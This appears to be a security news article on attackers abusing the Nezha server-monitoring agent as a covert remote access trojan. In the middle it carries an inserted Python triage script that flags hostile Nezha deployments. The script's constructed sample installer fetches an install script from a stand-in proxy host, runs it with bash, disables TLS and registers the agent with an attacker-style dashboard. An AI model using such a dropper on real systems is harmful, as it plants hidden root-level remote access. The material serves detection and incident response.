Attackers Weaponize Nezha Monitoring Tool

Insights Desk, December 22, 2025

The open-source server monitoring application Nezha is increasingly being used as a covert post-exploitation remote access trojan, according to new research released by Ontinue AG, a Swiss AI-powered managed extended detection and response (MXDR) provider. Originally created for the Chinese IT community, Nezha is actively maintained and has amassed around 10,000 stars on GitHub. Systems administrators use it to monitor multiple servers, track resource utilization, receive alerts, and carry out remote maintenance.

The problem is that, despite its legitimate purpose, attackers are increasingly using Nezha to obtain high-privilege, persistent access to victim environments after an initial compromise. As installed by default, the Nezha agent runs as root on Linux and with SYSTEM-level privileges on Windows, so whoever controls its dashboard gets file management, interactive terminal sessions, and full command execution without needing to escalate privileges or exploit a vulnerability. Because the binary is authentic and unmodified, it slips past signature-based defenses: at the time of the research it had zero detections across the antivirus engines aggregated by VirusTotal.

Ontinue's researchers discovered the malicious use of Nezha during an incident response engagement. The attackers attempted to deploy Nezha with a bash script that silently installed the agent and connected it to infrastructure under their control. To let the agent register with the attackers' Nezha dashboard, the script contained configuration parameters pointing to a command-and-control server together with a shared authentication secret. According to the report, the deployment fetched the agent through a GitHub proxy service and disabled TLS, though it is unclear why.
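The settings just described (a dashboard address, a shared secret, TLS switched off, a download routed through a GitHub proxy) are exactly the host artifacts an incident responder can triage. The following is an added example, not code from Ontinue or the Nezha project, that scans an installer script and an agent config for those settings and explains why they look hostile. Assumptions, not facts from the report: the NZ_SERVER, NZ_CLIENT_SECRET and NZ_TLS installer variables and the YAML keys server, client_secret, tls and insecure_tls are taken from the public Nezha agent as the author remembers them and must be checked against the agent version actually found; the dashboard allow-list, the proxy hostname and both sample inputs are constructed for this example.

```python
"""Triage helper for Nezha agent deployments found on a host.

Added example, not code from Ontinue or the Nezha project. Assumed (verify
against the agent version you find): installer variables NZ_SERVER,
NZ_CLIENT_SECRET, NZ_TLS and YAML keys server, client_secret, tls,
insecure_tls. The allow-list and sample inputs are constructed.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass, field

# Constructed allow-list: the only dashboard this organisation runs.
ALLOWED_DASHBOARDS = {"monitor.corp.example:8008"}

# Installer-style settings: NZ_SERVER=host:port, NZ_CLIENT_SECRET=..., NZ_TLS=true|false
ENV_RE = re.compile(r"\b(NZ_SERVER|NZ_CLIENT_SECRET|NZ_TLS)=[\"']?([^\"'\s;&|]+)")
ENV_TO_KEY = {"NZ_SERVER": "server", "NZ_CLIENT_SECRET": "client_secret", "NZ_TLS": "tls"}
# Agent YAML config keys (assumed names, see module docstring)
YAML_RE = re.compile(r"^\s*(server|client_secret|tls|insecure_tls)\s*:\s*[\"']?([^\"'\s#]+)", re.M)
# A "GitHub proxy" URL has the shape https://<proxy>/https://github.com/... ;
# the report names no proxy, so only the shape is matched.
PROXY_RE = re.compile(r"https?://[^/\s]+/https?://(?:raw\.)?github(?:usercontent)?\.com/", re.I)

FALSEY = {"false", "0", "no", "off"}
TRUTHY = {"true", "1", "yes", "on"}


@dataclass
class Finding:
    source: str
    server: str | None = None
    secret_present: bool = False
    reasons: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def _host_is_ip_literal(server: str) -> bool:
    """True when the dashboard is addressed as a bare IP rather than a managed hostname."""
    host = server.rsplit(":", 1)[0].strip("[]")
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyse(source: str, text: str) -> Finding:
    """Pull Nezha agent settings out of `text` and list the reasons they look hostile."""
    kv: dict[str, str] = {}
    for env_name, value in ENV_RE.findall(text):
        kv[ENV_TO_KEY[env_name]] = value
    for key, value in YAML_RE.findall(text):
        kv[key] = value

    f = Finding(source=source, server=kv.get("server"), secret_present="client_secret" in kv)
    if f.server:
        if f.server not in ALLOWED_DASHBOARDS:
            f.reasons.append(f"agent reports to {f.server}, which is not an approved dashboard")
        if _host_is_ip_literal(f.server):
            f.reasons.append("dashboard addressed by raw IP rather than a managed hostname")
    if kv.get("tls", "").lower() in FALSEY:
        f.reasons.append("TLS disabled: commands, terminal and file transfer travel in plaintext")
    if kv.get("insecure_tls", "").lower() in TRUTHY:
        f.reasons.append("TLS certificate verification disabled")
    if PROXY_RE.search(text):
        f.reasons.append("agent fetched through a GitHub proxy instead of directly from GitHub")
    return f


# Constructed sample resembling the dropper the report describes (not the actual script).
SAMPLE_INSTALLER = """\
#!/bin/bash
export NZ_SERVER=203.0.113.10:8008
export NZ_TLS=false
export NZ_CLIENT_SECRET=shared-secret-from-attacker
curl -fsSL https://gh-proxy.invalid/https://raw.githubusercontent.com/example-org/example-repo/main/install.sh -o /tmp/i.sh
bash /tmp/i.sh
"""

# Constructed sample of an agent config an administrator deployed on purpose.
SAMPLE_LEGIT_CONFIG = """\
client_secret: corp-managed-secret
server: monitor.corp.example:8008
tls: true
"""

if __name__ == "__main__":
    for name, text in [("installer.sh", SAMPLE_INSTALLER), ("config.yml", SAMPLE_LEGIT_CONFIG)]:
        finding = analyse(name, text)
        verdict = "SUSPICIOUS" if finding.suspicious else "ok"
        print(f"{name}: {verdict} (server={finding.server}, secret={'yes' if finding.secret_present else 'no'})")
        for reason in finding.reasons:
            print(f"  - {reason}")
```

Run against the two constructed inputs, the installer is flagged on four counts (unapproved dashboard, raw IP, TLS off, proxied download) while the administrator's config passes; the allow-list check is what matters most, since an agent reporting to a dashboard the organisation does not run is a compromise regardless of how it was installed.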
Subsequent analysis showed that the exposed Nezha dashboard involved in the incident appeared to control hundreds of endpoints, suggesting a broad compromise. The infrastructure was hosted in Alibaba Cloud IP space geolocated to Japan, showing how easily malicious operations can blend into legitimate cloud environments. Nezha's architecture multiplexes web dashboard traffic and agent communications over a single port using standard HTTP and gRPC, so, according to Ontinue's testing, the resulting network activity closely resembles ordinary monitoring telemetry. Because it looks legitimate, attackers can retain persistent access without producing obvious command-and-control indicators.

Mayuresh Dani, Security Research Manager at the Qualys Threat Research Unit, said: "The weaponization of Nezha reflects an emerging modern attack strategy where threat actors systematically abuse legitimate software to achieve persistence and lateral movement while evading signature-based defenses." "In networks where this server monitoring tool is pre-known, defender teams might even overlook this anomalous activity," Dani explains. "This is not novel at all, as this behavior has been seen in the past with the usage of 'Living Off the Land' techniques and remote monitoring and management tools such as TeamViewer."